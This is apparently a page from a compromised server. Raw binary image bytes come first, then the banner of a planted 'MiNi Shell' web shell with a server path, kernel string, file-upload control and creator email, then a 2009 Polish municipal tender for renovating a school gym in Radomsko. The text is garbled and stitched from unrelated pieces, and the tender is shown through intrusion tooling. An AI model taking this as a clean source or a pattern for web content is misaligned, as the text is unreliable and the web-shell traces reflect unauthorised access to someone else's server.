JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090831/143687-N-2009.html

<p class="kh_header"><b>Radomsko: Remont sali gimnastycznej w budynku Zespołu Szkolno-Gimnazjalnego nr 7 w Radomsku przy ul. 11-go Listopada 16</b><br>
<b>Numer ogłoszenia: 143687 - 2009; data zamieszczenia: 31.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Radomsko , ul. Tysiąclecia 5, 97-500 Radomsko, woj. łódzkie, tel. 044 6854571, faks 044 6854513, 6854521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radomsko.pl, www.bip.radomsko.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sali gimnastycznej w budynku Zespołu Szkolno-Gimnazjalnego nr 7 w Radomsku przy ul. 11-go Listopada 16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont sali gimnastycznej w budynku Zespołu Szkolno-Gimnazjalnego nr 7 w Radomsku przy ul. 11-go Listopada 16.

Zakres robót do wykonania zgodny ze  specyfikacją techniczną wykonania i odbioru robót, przedmiarem robót  i projektem budowlano wykonawczym  (z projektu   budowlano  wykonawczego wyłączono rozwiązania dot.  podłogi  sportowej w zakresie rusztu i wykładziny sportowej) obejmuje:

1.Wymianę podłogi w sali gimnastycznej w tym:
1.1 Rozbiórkę istniejącej podłogi.
1.2 Rozbiórkę części istniejącej posadzki betonowej.
1.3 Wykonanie nowego podłoża betonowego i posadzki na powierzchni dokonanej rozbiórki wraz                             z zaprojektowaną  izolacją termiczną oraz  przeciwwilgociową.
1.4 Wykonanie podłogi sportowej o następującej charakterystyce:
    - izolacja przeciwwilgociowa (folia paroizolacyjna   0,2 mm),
    - podwalina poziomująca  z drewna sosnowego lub świerkowego wym. 120x120 mm (dla  dostosowania  wysokości podłogi do poziomu podłóg istniejących w korytarzu).
    - element sprężysty (podkładka z granulatu gumowego o wymiarach 95x95x8 mm i gęstości  960kg/m3)                  o rozstawie co 50 cm  w osi pod legarem rusztu),
    - legary  rusztu układane krzyżowo (z drewna sosnowego lub świerkowego klasy II-III, gr. 22 mm, szer. 90-95mm, układane w rozstawie co 50 cm w osi),
    -  ślepa podłoga (z drewna sosnowego lub świerkowego klasy II-III,  grub. 19 mm, szerokości 90-95 mm, układane w rozstawie co 15 cm w osi
    -   izolacja przeciwwilgociowa (folia paroizolacyjna min. 0,2 mm)
       -   płyta wierzchnia rozkładająca naprężenia (płyta wiórowa o grubości 12 mm typu V-313, V-100 lub OSB-3, układana w dwóch warstwach na przemian)
   Podwalina poziomująca, legary i ślepa podłoga powinny być zaimpregnowane metodą zanurzeniową lub ciśnieniową  do stopnia trudnozapalności, wilgotność rusztu powinna się mieścić w granicach 12%-14%. System powinien obejmować wyposażenie podłogi w przestrzeni legarowej w system wymuszonej wentylacji mechanicznej.

     Nawierzchnia sportowa  - wykładzina homogeniczna, ścieralna w całym przekroju, grubości 3,2÷4,0 mm,              z powłoką  ochronną poliuretanową - niewymagająca dodatkowej konserwacji o następujących parametrach  zgodnych z  polską normą:
- redukcja siły (większa bądź równa) 55%
- odkształcenie pionowe  (większe bądź równe) 2,3 mm
- odbicie piłki  (większe bądź równe) 90%
- obciążenie toczne (większe bądź równe) 1500 N
Nawierzchnia sportowa powinna  być zgodna  z polską normą PN-EN 14904 na system  tj. ruszt   drewniany z wykładziną sportową   i  spełniać  wymagania  podłóg  sportowych powierzchniowo  sprężystych typ 4. Wykładzina sportowa powinna być w gat. I, rolowana.  
Wymaga się aby nawierzchnia podłogi sportowej mogła być wykorzystywana w szerokim zakresie - od profesjonalnego sportu do zajęć rekreacyjnych oraz imprez masowych, bez zabezpieczenia jej wykładzinami ochronnymi i na taką eksploatację wykonawca udzieli trzyletniej gwarancji.

1.5 Wykonanie instalacji elektrycznej dla obsługi wentylacji podłogi.

2.Montaż kosza podwieszanego do koszykówki w sali gimnastycznej w tym:
wykonanie oraz montaż wzmocnień dźwigarów dachowych
 wykonanie wraz z dostawą i montaż  kosza podwieszanego o parametrach:
konstrukcja podwieszana z napędem elektrycznym
mechanizm regulacji wysokości tablicy 105x180 cm. w zakresie 305÷260 cm.
tablica do koszykówki  o wymiarach 105x180
osłona dolnej krawędzi tablicy 105x180
obręcz do koszykówki uchylna z siłownikiem gazowym
siatka do obręczy, sznur 5 mm
      -     wykonanie instalacji elektrycznej dla obsługi zamontowanej konstrukcji kosza podwieszanego do koszykówki. 
 Szczegółowy opis przedmiotu zamówienia stanowią:
1)przedmiar robót - stanowiący dodatek nr 7 do SIWZ,
2)szczegółowa specyfikacja techniczna - stanowiąca dodatek nr 8 do SIWZ,
3)projekt budowlano - wykonawczy - remont podłogi - stanowiący dodatek nr 9 do SIWZ,
4)projekt budowlano - wykonawczy - montaż kosza - stanowiący dodatek nr 10 do SIWZ,
5)projekt budowlano - wykonawczy - montaż kosza - instalacje elektryczne - stanowiący dodatek nr 11 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.43.20.00-4, 45.41.22.25-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 4 000,00 PLN  (słownie: cztery tysiące  złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia może ubiegać się Wykonawca, który:
1)posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia tj. wykonał w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy                w tym okresie, roboty budowlane o łącznej wartości co najmniej 400 000,00 zł w zakresie wykonywania podłóg z wykładzin sportowych na konstrukcji - ruszcie - drewnianym.
3)dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia 
w tym dysponuje co najmniej:
a) osobą, która pełnić będzie funkcję kierownika budowy posiadającą określone przepisami ustawy Prawo budowlane (t.j. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie koniecznym do realizacji zadania                                  z przynależnością do właściwej izby samorządu zawodowego,
      b) osobą, która pełnić będzie funkcję kierownika robót w zakresie instalacji  elektrycznych posiadającą: 
    - uprawnienia budowlane określone przepisami Prawa Budowlanego (t.j. Dz. U. z 2006 r. Nr 156, poz. 1118 ze zm.) do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie wymaganym do realizacji zamówienia                     z przynależnością do właściwej izby samorządu zawodowego,
 - ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją  urządzeń, instalacji i sieci na stanowisku dozoru D w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla następujących urządzeń, instalacji i sieci:
urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV,
aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji; sterowania                 i zabezpieczeń w/w urządzeń i instalacji;

       c) do realizacji robót wskazać osobę posiadającą ważne świadectwo kwalifikacyjne uprawniające                             do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku eksploatacji E w zakresie obsługi konserwacji, remontów, montażu, kontrolno-pomiarowym dla następujących urządzeń, instalacji i sieci:
urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV,
aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji; sterowania i zabezpieczeń w/w urządzeń i instalacji.
  lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia   potencjału technicznego i osób zdolnych do wykonania zamówienia,
           Uwaga: Wykonawca obowiązany jest wskazać do pełnienia w/w funkcji trzy różne osoby.
4)znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
5)nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
II. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w Sekcji III.2) pkt III.1. niniejszego ogłoszenia będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający sprawdzi              z  treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie w/w warunki.

Uwaga: 
Zamawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że złożone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu (jeżeli dotyczy):

III.1. Oświadczenia oraz dokumenty potwierdzające spełnianie warunków, o których mowa w Sekcji III.2 pkt I:
1)oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy                              - z wykorzystaniem wzoru określonego w dodatku nr 2 do SIWZ;
2)oświadczenie, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez zamawiającego                 - z wykorzystaniem wzoru określonego w dodatku nr 3 do SIWZ;
3)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
4)aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega               z opłacaniem podatków, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
5)aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6)wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, robót budowlanych o łącznej wartości co najmniej 400 000,00 zł w zakresie wykonywania podłóg z wykładzin sportowych na konstrukcji - ruszcie - drewnianym, z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje),
7)wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności,
7a) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli                w wykazie, o którym mowa w pkt 7, Wykonawca wskazał osoby, którymi będzie dysponował,
8)dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, w tym:
        a) w odniesieniu do osoby o której mowa w pkt 5.1 ppkt 3 lit a SIWZ, która będzie pełnić funkcję kierownika budowy wykonawca musi dostarczyć uprawnienia budowlane uprawniające tę osobę do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie koniecznym do realizacji zadania oraz zaświadczenie o aktualnej przynależności tej osoby do właściwej izby samorządu zawodowego,
       b) w odniesieniu do osoby o której mowa w pkt 5.1 ppkt 3 lit b SIWZ, która będzie kierować robotami w zakresie instalacji  elektrycznych wykonawca musi dostarczyć: 
-  uprawnienia budowlane uprawniające tą osobę do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w zakresie wymaganym do realizacji zamówienia oraz zaświadczenie o aktualnej przynależności tej osoby do właściwej izby samorządu zawodowego,
-  ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci na stanowisku dozoru D w zakresie obsługi, konserwacji, remontów, montażu, kontrolno-pomiarowym dla następujących urządzeń, instalacji  i sieci:
urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV,
aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji; sterowania                   i zabezpieczeń w/w urządzeń i instalacji;

c) w odniesieniu do osoby o której mowa w pkt 5.1 ppkt 3 lit c SIWZ, która będzie realizować roboty, ważne świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci                            na stanowisku eksploatacji E w zakresie obsługi konserwacji, remontów, montażu, kontrolno-pomiarowym                 dla następujących urządzeń, instalacji i sieci:
urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym niż 1 kV,
aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej regulacji; sterowania                 i zabezpieczeń w/w urządzeń i instalacji.
III.1.I W celu potwierdzenia, że oferowane produkty odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda:

1)  Atestu PZH dla oferowanej wykładziny,
2) Dokumentu wystawionego przez producenta (deklaracji producenta) na trudnozapalność potwierdzającą klasę palności wykładziny na ruszcie drewnianym Cfl-S1 (wg EN 13501-1)
 3) Próbki z metryką producenta o minimalnych wymiarach 10x10 cm.

III.2 Oferta wspólna
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania                ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
2)Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza powinien              być załączony do oferty i zawierać w szczególności wskazanie:
a.postępowania o zamówienie publiczne, którego dotyczy;
b.wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy           z określeniem adresu siedziby;
c.ustanowionego Pełnomocnika oraz zakres jego umocowania;
3)Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie                  o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.
4)Dokumenty, o których mowa w Sekcji III.2) pkt III.1. ppkt 3,4,5 musi złożyć osobno każdy z Wykonawców składających ofertę wspólną;
5)W odniesieniu do warunków określonych w art. 22 ust. 1 pkt 2 i 3 ustawy, a w szczególności w Sekcji III.2)               pkt III.1. ppkt 6,7,7a,8 wymagania te muszą być spełnione wspólnie przez wykonawców składających ofertę wspólną  (nie musi ich spełniać każdy z wykonawców składających ofertę wspólną osobno).
6) Oświadczenia, formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, składa i podpisuje                   w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy                i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną;
7)Wszystkie kserokopie dokumentów załączone do oferty muszą być opisane za zgodność z oryginałem              i podpisane przez Pełnomocnika;
8)Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym.
9)Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. 
III.3  Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
III.3.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Sekcji III.2) pkt III.1. ppkt 3,4,5- składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo,              że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
III.3.2  Dokumenty, o których  mowa w Sekcji III.2) pkt III.3.1. lit. a, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w Sekcji III.2) pkt III.3.1. lit. b powinien być wystawiony  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
III.3.3  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,                nie wydaje się dokumentów, o których mowa w Sekcji III.2) pkt III.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia Sekcji III.2) pkt III.3.2 stosuje się odpowiednio.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.radomsko.pl,www.bip.radomsko.pl,.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Opłata za przekazanie SIWZ w formie papierowej wynosi 20,00 zł., płatne na konto w ESBANK Banku Spółdzielczym  Nr konta: 82 8980 0009 2001 0037 5283 0011.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2009 godzina 10:00, miejsce: Biuro Obsługi Interesanta -Biuro Podawcze w Urzędzie Miasta Radomska - parter budynku, 97-500 Radomsko ul. Tysiąclecia 5.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 19.10.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com